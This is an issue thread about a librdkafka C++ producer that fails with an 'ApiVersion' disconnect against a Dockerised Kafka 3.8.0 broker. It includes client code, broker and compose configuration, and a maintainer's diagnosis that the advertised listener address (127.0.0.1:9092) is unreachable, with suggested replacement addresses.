librdkafka
Error "Disconnected while requesting ApiVersion: might be caused by incorrect security.protocol configuration..." connecting to kafka broker 3.8.0
Description
I'm trying to connect to a Kafka broker with librdkafka, but the producer always fails with the following error:
%6|1724670994.540|FAIL|us-od.kafka-producer-1#producer-1| [thrd:127.0.0.1:9092/1]: 127.0.0.1:9092/1: Disconnected while requesting ApiVersion: might be caused by incorrect security.protocol configuration (connecting to a SSL listener?) or broker version is < 0.10 (see api.version.request) (after 0ms in state APIVERSION_QUERY, 3 identical error(s) suppressed)
Broker version is 3.8.0 (Docker image: bitnami/kafka, sha256:ed3c7264b110293d565cbe4ab479631f8b56196e98d19d4ab4fba689a142f176).
I run my client against librdkafka version 2.5.0, installed in an Alpine (3.19.0) Docker container. I installed librdkafka from the edge/community repository using apk add --no-cache librdkafka-dev --repository=https://dl-cdn.alpinelinux.org/alpine/edge/community. I also installed glib-dev, lz4-dev, pkgconfig, openssl-dev, and all the build and debug tools I need, as this is a development container.
The broker is configured with the following settings:
KAFKA_BROKER_ID=1
KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CLIENT:PLAINTEXT,EXTERNAL:PLAINTEXT
KAFKA_CFG_LISTENERS=CLIENT://:9093,EXTERNAL://:9092
KAFKA_CFG_ADVERTISED_LISTENERS=CLIENT://kafka:9093,EXTERNAL://127.0.0.1:9092
KAFKA_CFG_INTER_BROKER_LISTENER_NAME=CLIENT
KAFKA_CFG_ZOOKEEPER_CONNECT=zookeeper:2181
ALLOW_PLAINTEXT_LISTENER=yes
I create the client (producer) with this:
// Configuration
char errstr[512];
rd_kafka_conf_t *kafka_conf = rd_kafka_conf_new();
// Parameters are copied from a YAML file and applied with rd_kafka_conf_set():
// bootstrap.servers=localhost:9092, security.protocol=PLAINTEXT,
// log_level=7, api.version.request=true
rd_kafka_conf_set(kafka_conf, "bootstrap.servers", "localhost:9092", errstr, sizeof(errstr));
rd_kafka_conf_set(kafka_conf, "security.protocol", "PLAINTEXT", errstr, sizeof(errstr));
rd_kafka_conf_set(kafka_conf, "log_level", "7", errstr, sizeof(errstr));
rd_kafka_conf_set(kafka_conf, "api.version.request", "true", errstr, sizeof(errstr));
// Producer (takes ownership of kafka_conf on success)
producer = rd_kafka_new(RD_KAFKA_PRODUCER, kafka_conf, errstr, sizeof(errstr));
// Messages are sent to the queue using:
err = rd_kafka_producev(
    producer,
    RD_KAFKA_V_TOPIC(topic_name),
    RD_KAFKA_V_MSGFLAGS(RD_KAFKA_MSG_F_COPY),
    RD_KAFKA_V_VALUE((void *) message_content.c_str(), message_content.size()),
    RD_KAFKA_V_OPAQUE(NULL),
    RD_KAFKA_V_END);
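For completeness: the snippet above only enqueues the message. librdkafka delivers asynchronously and reports the outcome through a delivery-report callback served by rd_kafka_poll(). The rest of my produce path looks roughly like this (the callback below is a simplified sketch, not a verbatim copy of my code):

#include <cstdio>
#include <librdkafka/rdkafka.h>

// Delivery-report callback: invoked from rd_kafka_poll()/rd_kafka_flush()
// once per message with its final delivery status.
static void dr_msg_cb(rd_kafka_t *rk, const rd_kafka_message_t *rkmessage,
                      void *opaque) {
    if (rkmessage->err)
        std::fprintf(stderr, "Delivery failed: %s\n",
                     rd_kafka_err2str(rkmessage->err));
    else
        std::fprintf(stderr, "Delivered %zu bytes to partition %d\n",
                     rkmessage->len, (int)rkmessage->partition);
}

// Registered on the configuration before rd_kafka_new():
//     rd_kafka_conf_set_dr_msg_cb(kafka_conf, dr_msg_cb);
// Served after each rd_kafka_producev() and periodically afterwards:
//     rd_kafka_poll(producer, 0);
// And before shutdown, waiting for outstanding messages:
//     rd_kafka_flush(producer, 10 * 1000);  // up to 10 s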
If I use a client developed in Kotlin that uses the Java Kafka client, I can connect to the broker and publish or consume without issues.
It is the same for a test Python application with default settings: I can connect and send messages:
from kafka import KafkaProducer

producer = KafkaProducer(bootstrap_servers="localhost:9092")
fut = producer.send(
    topic="my-topic",
    value=value
)
res = fut.get(timeout=10)
producer.flush()
Things noted
I captured network traffic with Wireshark and found something that caught my attention. The C++ client goes through a long list of Metadata requests and does not seem to get any further than that point.
The Python client, which I assume may be using a possibly outdated rdkafka library version, does not go through that long list of Metadata requests.
Is there any configuration I'm missing? Is there any other component I need to install for the client to be able to operate as expected?
BR, V.
Checklist
Please provide the following information:
- [x] librdkafka version (release number or git tag): 2.5.0
- [x] Apache Kafka version: 3.8.0
- [x] librdkafka client configuration: bootstrap.servers=localhost:9092, security.protocol=PLAINTEXT, log_level=7, api.version.request=true
- [x] Operating system: Alpine (3.19.0)
- [x] Provide logs (with debug=.. as necessary) from librdkafka: the only log line produced is: %6|1724673649.217|FAIL|us-od.kafka-producer-1#producer-1| [thrd:127.0.0.1:9092/1]: 127.0.0.1:9092/1: Disconnected while requesting ApiVersion: might be caused by incorrect security.protocol configuration (connecting to a SSL listener?) or broker version is < 0.10 (see api.version.request) (after 0ms in state APIVERSION_QUERY, 4 identical error(s) suppressed)
- [x] Provide broker log excerpts: the broker does not produce any log entry
- [x] Critical issue
Can you capture debug logs with debug='all' in your config and provide them?
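For reference, enabling that from the C API looks roughly like this (the helper and callback names here are illustrative examples):

#include <cstdio>
#include <librdkafka/rdkafka.h>

// Forward librdkafka's internal log lines somewhere collectable.
static void log_cb(const rd_kafka_t *rk, int level, const char *fac,
                   const char *buf) {
    std::fprintf(stderr, "%d|%s| %s\n", level, fac, buf);
}

static void enable_debug_logging(rd_kafka_conf_t *conf) {
    char errstr[512];
    // debug=all enables every debug context; log_level=7 keeps the
    // LOG_DEBUG lines from being filtered out.
    rd_kafka_conf_set(conf, "debug", "all", errstr, sizeof(errstr));
    rd_kafka_conf_set(conf, "log_level", "7", errstr, sizeof(errstr));
    rd_kafka_conf_set_log_cb(conf, log_cb);
}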
I've now tested against librdkafka 2.5.0-2, built and installed from source, configured with --enable-zlib --enable-zstd --enable-ssl --enable-gssapi --enable-curl --disable-lz4-ext.
Config parameters are: bootstrap.servers=192.168.1.106:9092, log_level=7, debug=all, allow.auto.create.topics=true.
Logs are attached: log-librdkafka-1.txt. BR
Any findings, @anchitj?
Any updates on this, @anchitj?
Hi, were you able to take a look at this?
It seems that in your test the calls (ApiVersions, Metadata) are succeeding when connecting to the bootstrap server 192.168.1.106:9092/bootstrap but failing when connecting to the advertised listener 127.0.0.1:9092. Could you check whether port forwarding was enabled in this test to reach the Docker container?
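If it helps, you can also dump the broker addresses returned in the Metadata response; those are the advertised listeners the client reconnects to after bootstrap, so they show exactly which address is failing. A rough sketch (the helper name is just an example):

#include <cstdio>
#include <librdkafka/rdkafka.h>

// Print the broker addresses advertised by the cluster. After the initial
// bootstrap connection, librdkafka reconnects to these addresses, so if they
// are not reachable from the client (e.g. 127.0.0.1:9092 from another host or
// container), requests keep failing even though bootstrap succeeded.
static void dump_advertised_brokers(rd_kafka_t *rk) {
    const struct rd_kafka_metadata *md = NULL;
    rd_kafka_resp_err_t err = rd_kafka_metadata(rk, 0 /* no topics */, NULL,
                                                &md, 5000 /* ms */);
    if (err) {
        std::fprintf(stderr, "metadata request failed: %s\n",
                     rd_kafka_err2str(err));
        return;
    }
    for (int i = 0; i < md->broker_cnt; i++)
        std::fprintf(stderr, "broker %d advertises %s:%d\n",
                     (int)md->brokers[i].id, md->brokers[i].host,
                     md->brokers[i].port);
    rd_kafka_metadata_destroy(md);
}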
I've created a new compose file; the test application now runs inside the same Docker compose application as ZooKeeper and Kafka. The error is different now: Disconnected while requesting ApiVersion: might be caused by incorrect security.protocol configuration (connecting to a SSL listener?) or broker version is < 0.10 (...etc...). I've attached the log: log-librdkafka-2.txt
Below are the compose sections for ZooKeeper and Kafka.
zookeeper:
  container_name: oddev_zookeeper
  image: 'bitnami/zookeeper:latest'
  ports:
    - '12181:2181'
  environment:
    - ALLOW_ANONYMOUS_LOGIN=yes
  networks:
    - monitor
kafka:
  container_name: oddev_kafka
  image: 'bitnami/kafka:latest'
  networks:
    - monitor
  ports:
    - '19092:9092'
    - '19093:9093'
  environment:
    - KAFKA_BROKER_ID=1
    - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CLIENT:PLAINTEXT,EXTERNAL:PLAINTEXT
    - KAFKA_CFG_LISTENERS=CLIENT://:9093,EXTERNAL://:9092
    - KAFKA_CFG_ADVERTISED_LISTENERS=CLIENT://kafka:9093,EXTERNAL://127.0.0.1:9092
    - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=CLIENT
    - KAFKA_CFG_ZOOKEEPER_CONNECT=oddev_zookeeper:2181
    - ALLOW_PLAINTEXT_LISTENER=yes
  depends_on:
    - zookeeper
kafka-visualizer:
  container_name: oddev_kafka-visualizer
  image: 'provectuslabs/kafka-ui:latest'
  networks:
    - monitor
  ports:
    - '18080:8080'
  environment:
    - KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS=kafka:9093
I think the problem is with the EXTERNAL advertised listener, because it advertises EXTERNAL://127.0.0.1:9092 while the client is using the localhost address of the host.
Try advertising the same address as in the bootstrap servers, EXTERNAL://192.168.1.106:9092, since the client can already connect to that one.
Using localhost with the forwarded port 19092 should also work:
EXTERNAL://localhost:19092
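In compose terms, that would mean changing only the advertised-listeners line in the environment section shown above, for example one of (these simply restate the two alternatives in the compose syntax used earlier):

# advertise the same address that bootstrap.servers uses
- KAFKA_CFG_ADVERTISED_LISTENERS=CLIENT://kafka:9093,EXTERNAL://192.168.1.106:9092
# or advertise localhost with the forwarded host port
- KAFKA_CFG_ADVERTISED_LISTENERS=CLIENT://kafka:9093,EXTERNAL://localhost:19092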